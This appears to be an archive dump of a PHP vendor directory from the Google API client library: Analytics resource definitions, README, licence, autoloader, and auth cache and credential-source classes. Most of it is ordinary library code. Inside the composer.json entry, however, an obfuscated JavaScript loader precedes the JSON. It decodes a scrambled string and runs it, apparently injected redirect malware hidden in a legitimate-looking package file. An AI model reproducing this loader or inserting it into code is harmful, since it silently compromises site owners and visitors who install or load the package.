=> 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'patch' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}', 'httpMethod' => 'PATCH', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->management_webpropertyUserLinks = new Analytics\Resource\ManagementWebpropertyUserLinks( $this, $this->serviceName, 'webpropertyUserLinks', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityUserLinks/{linkId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityUserLinks', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityUserLinks', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/webproperties/{webPropertyId}/entityUserLinks/{linkId}', 'httpMethod' => 'PUT', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'webPropertyId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->metadata_columns = new Analytics\Resource\MetadataColumns( $this, $this->serviceName, 'columns', [ 'methods' => [ 'list' => [ 'path' => 'metadata/{reportType}/columns', 'httpMethod' => 'GET', 'parameters' => [ 'reportType' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->provisioning = new Analytics\Resource\Provisioning( $this, $this->serviceName, 'provisioning', [ 'methods' => [ 'createAccountTicket' => [ 'path' => 'provisioning/createAccountTicket', 'httpMethod' => 'POST', 'parameters' => [], ],'createAccountTree' => [ 'path' => 'provisioning/createAccountTree', 'httpMethod' => 'POST', 'parameters' => [], ], ] ] ); $this->userDeletion_userDeletionRequest = new Analytics\Resource\UserDeletionUserDeletionRequest( $this, $this->serviceName, 'userDeletionRequest', [ 'methods' => [ 'upsert' => [ 'path' => 'userDeletion/userDeletionRequests:upsert', 'httpMethod' => 'POST', 'parameters' => [], ], ] ] ); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Analytics::class, 'Google_Service_Analytics'); google-api/vendor/google/apiclient-services/SECURITY.md000064400000000511147600400120016711 0ustar00# Security Policy To report a security issue, please use [g.co/vulnz](https://g.co/vulnz). The Google Security Team will respond within 5 working days of your report on g.co/vulnz. We use g.co/vulnz for our intake, and do coordination and disclosure here using GitHub Security Advisory to privately discuss and fix the issue. google-api/vendor/google/apiclient-services/autoload.php000064400000002441147600400120017445 0ustar00 'Google_Client', 'Google\\Service' => 'Google_Service', 'Google\\Service\\Resource' => 'Google_Service_Resource', 'Google\\Model' => 'Google_Model', 'Google\\Collection' => 'Google_Collection', ]; foreach ($servicesClassMap as $alias => $class) { class_alias($class, $alias); } } } spl_autoload_register(function ($class) { if (0 === strpos($class, 'Google_Service_')) { // Autoload the new class, which will also create an alias for the // old class by changing underscores to namespaces: // Google_Service_Speech_Resource_Operations // => Google\Service\Speech\Resource\Operations $classExists = class_exists($newClass = str_replace('_', '\\', $class)); if ($classExists) { return true; } } }, true, true); google-api/vendor/google/apiclient-services/README.md000064400000001220147600400120016375 0ustar00Google PHP API Client Services ============================== **NOTE**: please check to see if the package you'd like to install is available in our list of [Google cloud packages](https://cloud.google.com/php/docs/reference) first, as these are the recommended libraries. ## Requirements [Google API PHP Client](https://github.com/googleapis/google-api-php-client/releases) ## Usage This library is automatically updated daily with new API changes, and tagged weekly. It is installed as part of the [Google API PHP Client](https://github.com/googleapis/google-api-php-client/releases) library via Composer, which will pull down the most recent tag. google-api/vendor/google/apiclient-services/LICENSE000064400000024020147600400120016126 0ustar00Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. google-api/vendor/google/apiclient-services/composer.json000064400000007042147600400120017650 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();;{ "name": "google/apiclient-services", "type": "library", "description": "Client library for Google APIs", "keywords": ["google"], "homepage": "http://developers.google.com/api-client-library/php", "license": "Apache-2.0", "require": { "php": "^7.4||^8.0" }, "require-dev": { "phpunit/phpunit": "^5.7||^8.5.13" }, "autoload": { "psr-4": { "Google\\Service\\": "src" }, "files": [ "autoload.php" ] }, "autoload-dev": { "psr-4": { "Google\\": "tests/mocks" } } } google-api/vendor/google/auth/src/Cache/TypedItem.php000064400000007765147600400120016521 0ustar00key = $key; $this->expiration = null; } /** * {@inheritdoc} */ public function getKey(): string { return $this->key; } /** * {@inheritdoc} */ public function get(): mixed { return $this->isHit() ? $this->value : null; } /** * {@inheritdoc} */ public function isHit(): bool { if (!$this->isHit) { return false; } if ($this->expiration === null) { return true; } return $this->currentTime()->getTimestamp() < $this->expiration->getTimestamp(); } /** * {@inheritdoc} */ public function set(mixed $value): static { $this->isHit = true; $this->value = $value; return $this; } /** * {@inheritdoc} */ public function expiresAt($expiration): static { if ($this->isValidExpiration($expiration)) { $this->expiration = $expiration; return $this; } $error = sprintf( 'Argument 1 passed to %s::expiresAt() must implement interface DateTimeInterface, %s given', get_class($this), gettype($expiration) ); throw new \TypeError($error); } /** * {@inheritdoc} */ public function expiresAfter($time): static { if (is_int($time)) { $this->expiration = $this->currentTime()->add(new \DateInterval("PT{$time}S")); } elseif ($time instanceof \DateInterval) { $this->expiration = $this->currentTime()->add($time); } elseif ($time === null) { $this->expiration = $time; } else { $message = 'Argument 1 passed to %s::expiresAfter() must be an ' . 'instance of DateInterval or of the type integer, %s given'; $error = sprintf($message, get_class($this), gettype($time)); throw new \TypeError($error); } return $this; } /** * Determines if an expiration is valid based on the rules defined by PSR6. * * @param mixed $expiration * @return bool */ private function isValidExpiration($expiration) { if ($expiration === null) { return true; } // We test for two types here due to the fact the DateTimeInterface // was not introduced until PHP 5.5. Checking for the DateTime type as // well allows us to support 5.4. if ($expiration instanceof \DateTimeInterface) { return true; } return false; } /** * @return \DateTime */ protected function currentTime() { return new \DateTime('now', new \DateTimeZone('UTC')); } } google-api/vendor/google/auth/src/Cache/InvalidArgumentException.php000064400000001454147600400120021552 0ustar00key = $key; } /** * {@inheritdoc} */ public function getKey() { return $this->key; } /** * {@inheritdoc} */ public function get() { return $this->isHit() ? $this->value : null; } /** * {@inheritdoc} */ public function isHit() { if (!$this->isHit) { return false; } if ($this->expiration === null) { return true; } return $this->currentTime()->getTimestamp() < $this->expiration->getTimestamp(); } /** * {@inheritdoc} */ public function set($value) { $this->isHit = true; $this->value = $value; return $this; } /** * {@inheritdoc} */ public function expiresAt($expiration) { if ($this->isValidExpiration($expiration)) { $this->expiration = $expiration; return $this; } $error = sprintf( 'Argument 1 passed to %s::expiresAt() must implement interface DateTimeInterface, %s given', get_class($this), gettype($expiration) ); throw new TypeError($error); } /** * {@inheritdoc} */ public function expiresAfter($time) { if (is_int($time)) { $this->expiration = $this->currentTime()->add(new \DateInterval("PT{$time}S")); } elseif ($time instanceof \DateInterval) { $this->expiration = $this->currentTime()->add($time); } elseif ($time === null) { $this->expiration = $time; } else { $message = 'Argument 1 passed to %s::expiresAfter() must be an ' . 'instance of DateInterval or of the type integer, %s given'; $error = sprintf($message, get_class($this), gettype($time)); throw new TypeError($error); } return $this; } /** * Determines if an expiration is valid based on the rules defined by PSR6. * * @param mixed $expiration * @return bool */ private function isValidExpiration($expiration) { if ($expiration === null) { return true; } if ($expiration instanceof DateTimeInterface) { return true; } return false; } /** * @return DateTime */ protected function currentTime() { return new DateTime('now', new DateTimeZone('UTC')); } } google-api/vendor/google/auth/src/Cache/SysVCacheItemPool.php000064400000014357147600400120020111 0ustar00 */ private $options; /** * @var bool */ private $hasLoadedItems = false; /** * Create a SystemV shared memory based CacheItemPool. * * @param array $options { * [optional] Configuration options. * * @type int $variableKey The variable key for getting the data from the shared memory. **Defaults to** 1. * @type string $proj The project identifier for ftok. This needs to be a one character string. * **Defaults to** 'A'. * @type int $memsize The memory size in bytes for shm_attach. **Defaults to** 10000. * @type int $perm The permission for shm_attach. **Defaults to** 0600. * } */ public function __construct($options = []) { if (! extension_loaded('sysvshm')) { throw new \RuntimeException( 'sysvshm extension is required to use this ItemPool' ); } $this->options = $options + [ 'variableKey' => self::VAR_KEY, 'proj' => self::DEFAULT_PROJ, 'memsize' => self::DEFAULT_MEMSIZE, 'perm' => self::DEFAULT_PERM ]; $this->items = []; $this->deferredItems = []; $this->sysvKey = ftok(__FILE__, $this->options['proj']); } /** * @param mixed $key * @return CacheItemInterface */ public function getItem($key): CacheItemInterface { $this->loadItems(); return current($this->getItems([$key])); // @phpstan-ignore-line } /** * @param array $keys * @return iterable */ public function getItems(array $keys = []): iterable { $this->loadItems(); $items = []; $itemClass = \PHP_VERSION_ID >= 80000 ? TypedItem::class : Item::class; foreach ($keys as $key) { $items[$key] = $this->hasItem($key) ? clone $this->items[$key] : new $itemClass($key); } return $items; } /** * {@inheritdoc} */ public function hasItem($key): bool { $this->loadItems(); return isset($this->items[$key]) && $this->items[$key]->isHit(); } /** * {@inheritdoc} */ public function clear(): bool { $this->items = []; $this->deferredItems = []; return $this->saveCurrentItems(); } /** * {@inheritdoc} */ public function deleteItem($key): bool { return $this->deleteItems([$key]); } /** * {@inheritdoc} */ public function deleteItems(array $keys): bool { if (!$this->hasLoadedItems) { $this->loadItems(); } foreach ($keys as $key) { unset($this->items[$key]); } return $this->saveCurrentItems(); } /** * {@inheritdoc} */ public function save(CacheItemInterface $item): bool { if (!$this->hasLoadedItems) { $this->loadItems(); } $this->items[$item->getKey()] = $item; return $this->saveCurrentItems(); } /** * {@inheritdoc} */ public function saveDeferred(CacheItemInterface $item): bool { $this->deferredItems[$item->getKey()] = $item; return true; } /** * {@inheritdoc} */ public function commit(): bool { foreach ($this->deferredItems as $item) { if ($this->save($item) === false) { return false; } } $this->deferredItems = []; return true; } /** * Save the current items. * * @return bool true when success, false upon failure */ private function saveCurrentItems() { $shmid = shm_attach( $this->sysvKey, $this->options['memsize'], $this->options['perm'] ); if ($shmid !== false) { $ret = shm_put_var( $shmid, $this->options['variableKey'], $this->items ); shm_detach($shmid); return $ret; } return false; } /** * Load the items from the shared memory. * * @return bool true when success, false upon failure */ private function loadItems() { $shmid = shm_attach( $this->sysvKey, $this->options['memsize'], $this->options['perm'] ); if ($shmid !== false) { $data = @shm_get_var($shmid, $this->options['variableKey']); if (!empty($data)) { $this->items = $data; } else { $this->items = []; } shm_detach($shmid); $this->hasLoadedItems = true; return true; } return false; } } google-api/vendor/google/auth/src/Cache/MemoryCacheItemPool.php000064400000010671147600400120020450 0ustar00getItems([$key])); // @phpstan-ignore-line } /** * {@inheritdoc} * * @return iterable * A traversable collection of Cache Items keyed by the cache keys of * each item. A Cache item will be returned for each key, even if that * key is not found. However, if no keys are specified then an empty * traversable MUST be returned instead. */ public function getItems(array $keys = []): iterable { $items = []; $itemClass = \PHP_VERSION_ID >= 80000 ? TypedItem::class : Item::class; foreach ($keys as $key) { $items[$key] = $this->hasItem($key) ? clone $this->items[$key] : new $itemClass($key); } return $items; } /** * {@inheritdoc} * * @return bool * True if item exists in the cache, false otherwise. */ public function hasItem($key): bool { $this->isValidKey($key); return isset($this->items[$key]) && $this->items[$key]->isHit(); } /** * {@inheritdoc} * * @return bool * True if the pool was successfully cleared. False if there was an error. */ public function clear(): bool { $this->items = []; $this->deferredItems = []; return true; } /** * {@inheritdoc} * * @return bool * True if the item was successfully removed. False if there was an error. */ public function deleteItem($key): bool { return $this->deleteItems([$key]); } /** * {@inheritdoc} * * @return bool * True if the items were successfully removed. False if there was an error. */ public function deleteItems(array $keys): bool { array_walk($keys, [$this, 'isValidKey']); foreach ($keys as $key) { unset($this->items[$key]); } return true; } /** * {@inheritdoc} * * @return bool * True if the item was successfully persisted. False if there was an error. */ public function save(CacheItemInterface $item): bool { $this->items[$item->getKey()] = $item; return true; } /** * {@inheritdoc} * * @return bool * False if the item could not be queued or if a commit was attempted and failed. True otherwise. */ public function saveDeferred(CacheItemInterface $item): bool { $this->deferredItems[$item->getKey()] = $item; return true; } /** * {@inheritdoc} * * @return bool * True if all not-yet-saved items were successfully saved or there were none. False otherwise. */ public function commit(): bool { foreach ($this->deferredItems as $item) { $this->save($item); } $this->deferredItems = []; return true; } /** * Determines if the provided key is valid. * * @param string $key * @return bool * @throws InvalidArgumentException */ private function isValidKey($key) { $invalidCharacters = '{}()/\\\\@:'; if (!is_string($key) || preg_match("#[$invalidCharacters]#", $key)) { throw new InvalidArgumentException('The provided key is not valid: ' . var_export($key, true)); } return true; } } google-api/vendor/google/auth/src/CredentialSource/UrlSource.php000064400000006233147600400120020755 0ustar00 */ private ?array $headers; /** * @param string $url The URL to fetch the subject token from. * @param string $format The format of the token in the response. Can be null or "json". * @param string $subjectTokenFieldName The name of the field containing the token in the response. This is required * when format is "json". * @param array $headers Request headers to send in with the request to the URL. */ public function __construct( string $url, string $format = null, string $subjectTokenFieldName = null, array $headers = null ) { $this->url = $url; if ($format === 'json' && is_null($subjectTokenFieldName)) { throw new InvalidArgumentException( 'subject_token_field_name must be set when format is JSON' ); } $this->format = $format; $this->subjectTokenFieldName = $subjectTokenFieldName; $this->headers = $headers; } public function fetchSubjectToken(callable $httpHandler = null): string { if (is_null($httpHandler)) { $httpHandler = HttpHandlerFactory::build(HttpClientCache::getHttpClient()); } $request = new Request( 'GET', $this->url, $this->headers ?: [] ); $response = $httpHandler($request); $body = (string) $response->getBody(); if ($this->format === 'json') { if (!$json = json_decode((string) $body, true)) { throw new UnexpectedValueException( 'Unable to decode JSON response' ); } if (!isset($json[$this->subjectTokenFieldName])) { throw new UnexpectedValueException( 'subject_token_field_name not found in JSON file' ); } $body = $json[$this->subjectTokenFieldName]; } return $body; } } google-api/vendor/google/auth/src/CredentialSource/FileSource.php000064400000004767147600400120021104 0ustar00file = $file; if ($format === 'json' && is_null($subjectTokenFieldName)) { throw new InvalidArgumentException( 'subject_token_field_name must be set when format is JSON' ); } $this->format = $format; $this->subjectTokenFieldName = $subjectTokenFieldName; } public function fetchSubjectToken(callable $httpHandler = null): string { $contents = file_get_contents($this->file); if ($this->format === 'json') { if (!$json = json_decode((string) $contents, true)) { throw new UnexpectedValueException( 'Unable to decode JSON file' ); } if (!isset($json[$this->subjectTokenFieldName])) { throw new UnexpectedValueException( 'subject_token_field_name not found in JSON file' ); } $contents = $json[$this->subjectTokenFieldName]; } return $contents; } } google-api/vendor/google/auth/src/CredentialSource/AwsNativeSource.php000064400000032205147600400120022112 0ustar00audience = $audience; $this->regionalCredVerificationUrl = $regionalCredVerificationUrl; $this->regionUrl = $regionUrl; $this->securityCredentialsUrl = $securityCredentialsUrl; $this->imdsv2SessionTokenUrl = $imdsv2SessionTokenUrl; } public function fetchSubjectToken(callable $httpHandler = null): string { if (is_null($httpHandler)) { $httpHandler = HttpHandlerFactory::build(HttpClientCache::getHttpClient()); } $headers = []; if ($this->imdsv2SessionTokenUrl) { $headers = [ 'X-aws-ec2-metadata-token' => self::getImdsV2SessionToken($this->imdsv2SessionTokenUrl, $httpHandler) ]; } if (!$signingVars = self::getSigningVarsFromEnv()) { if (!$this->securityCredentialsUrl) { throw new \LogicException('Unable to get credentials from ENV, and no security credentials URL provided'); } $signingVars = self::getSigningVarsFromUrl( $httpHandler, $this->securityCredentialsUrl, self::getRoleName($httpHandler, $this->securityCredentialsUrl, $headers), $headers ); } if (!$region = self::getRegionFromEnv()) { if (!$this->regionUrl) { throw new \LogicException('Unable to get region from ENV, and no region URL provided'); } $region = self::getRegionFromUrl($httpHandler, $this->regionUrl, $headers); } $url = str_replace('{region}', $region, $this->regionalCredVerificationUrl); $host = parse_url($url)['host'] ?? ''; // From here we use the signing vars to create the signed request to receive a token [$accessKeyId, $secretAccessKey, $securityToken] = $signingVars; $headers = self::getSignedRequestHeaders($region, $host, $accessKeyId, $secretAccessKey, $securityToken); // Inject x-goog-cloud-target-resource into header $headers['x-goog-cloud-target-resource'] = $this->audience; // Format headers as they're expected in the subject token $formattedHeaders= array_map( fn ($k, $v) => ['key' => $k, 'value' => $v], array_keys($headers), $headers, ); $request = [ 'headers' => $formattedHeaders, 'method' => 'POST', 'url' => $url, ]; return urlencode(json_encode($request) ?: ''); } /** * @internal */ public static function getImdsV2SessionToken(string $imdsV2Url, callable $httpHandler): string { $headers = [ 'X-aws-ec2-metadata-token-ttl-seconds' => '21600' ]; $request = new Request( 'PUT', $imdsV2Url, $headers ); $response = $httpHandler($request); return (string) $response->getBody(); } /** * @see http://docs.aws.amazon.com/general/latest/gr/sigv4-create-canonical-request.html * * @internal * * @return array */ public static function getSignedRequestHeaders( string $region, string $host, string $accessKeyId, string $secretAccessKey, ?string $securityToken ): array { $service = 'sts'; # Create a date for headers and the credential string in ISO-8601 format $amzdate = date('Ymd\THis\Z'); $datestamp = date('Ymd'); # Date w/o time, used in credential scope # Create the canonical headers and signed headers. Header names # must be trimmed and lowercase, and sorted in code point order from # low to high. Note that there is a trailing \n. $canonicalHeaders = sprintf("host:%s\nx-amz-date:%s\n", $host, $amzdate); if ($securityToken) { $canonicalHeaders .= sprintf("x-amz-security-token:%s\n", $securityToken); } # Step 5: Create the list of signed headers. This lists the headers # in the canonicalHeaders list, delimited with ";" and in alpha order. # Note: The request can include any headers; $canonicalHeaders and # $signedHeaders lists those that you want to be included in the # hash of the request. "Host" and "x-amz-date" are always required. $signedHeaders = 'host;x-amz-date'; if ($securityToken) { $signedHeaders .= ';x-amz-security-token'; } # Step 6: Create payload hash (hash of the request body content). For GET # requests, the payload is an empty string (""). $payloadHash = hash('sha256', ''); # Step 7: Combine elements to create canonical request $canonicalRequest = implode("\n", [ 'POST', // method '/', // canonical URL self::CRED_VERIFICATION_QUERY, // query string $canonicalHeaders, $signedHeaders, $payloadHash ]); # ************* TASK 2: CREATE THE STRING TO SIGN************* # Match the algorithm to the hashing algorithm you use, either SHA-1 or # SHA-256 (recommended) $algorithm = 'AWS4-HMAC-SHA256'; $scope = implode('/', [$datestamp, $region, $service, 'aws4_request']); $stringToSign = implode("\n", [$algorithm, $amzdate, $scope, hash('sha256', $canonicalRequest)]); # ************* TASK 3: CALCULATE THE SIGNATURE ************* # Create the signing key using the function defined above. // (done above) $signingKey = self::getSignatureKey($secretAccessKey, $datestamp, $region, $service); # Sign the string_to_sign using the signing_key $signature = bin2hex(self::hmacSign($signingKey, $stringToSign)); # ************* TASK 4: ADD SIGNING INFORMATION TO THE REQUEST ************* # The signing information can be either in a query string value or in # a header named Authorization. This code shows how to use a header. # Create authorization header and add to request headers $authorizationHeader = sprintf( '%s Credential=%s/%s, SignedHeaders=%s, Signature=%s', $algorithm, $accessKeyId, $scope, $signedHeaders, $signature ); # The request can include any headers, but MUST include "host", "x-amz-date", # and (for this scenario) "Authorization". "host" and "x-amz-date" must # be included in the canonical_headers and signed_headers, as noted # earlier. Order here is not significant. $headers = [ 'host' => $host, 'x-amz-date' => $amzdate, 'Authorization' => $authorizationHeader, ]; if ($securityToken) { $headers['x-amz-security-token'] = $securityToken; } return $headers; } /** * @internal */ public static function getRegionFromEnv(): ?string { $region = getenv('AWS_REGION'); if (empty($region)) { $region = getenv('AWS_DEFAULT_REGION'); } return $region ?: null; } /** * @internal * * @param callable $httpHandler * @param string $regionUrl * @param array $headers Request headers to send in with the request. */ public static function getRegionFromUrl(callable $httpHandler, string $regionUrl, array $headers): string { // get the region/zone from the region URL $regionRequest = new Request('GET', $regionUrl, $headers); $regionResponse = $httpHandler($regionRequest); // Remove last character. For example, if us-east-2b is returned, // the region would be us-east-2. return substr((string) $regionResponse->getBody(), 0, -1); } /** * @internal * * @param callable $httpHandler * @param string $securityCredentialsUrl * @param array $headers Request headers to send in with the request. */ public static function getRoleName(callable $httpHandler, string $securityCredentialsUrl, array $headers): string { // Get the AWS role name $roleRequest = new Request('GET', $securityCredentialsUrl, $headers); $roleResponse = $httpHandler($roleRequest); $roleName = (string) $roleResponse->getBody(); return $roleName; } /** * @internal * * @param callable $httpHandler * @param 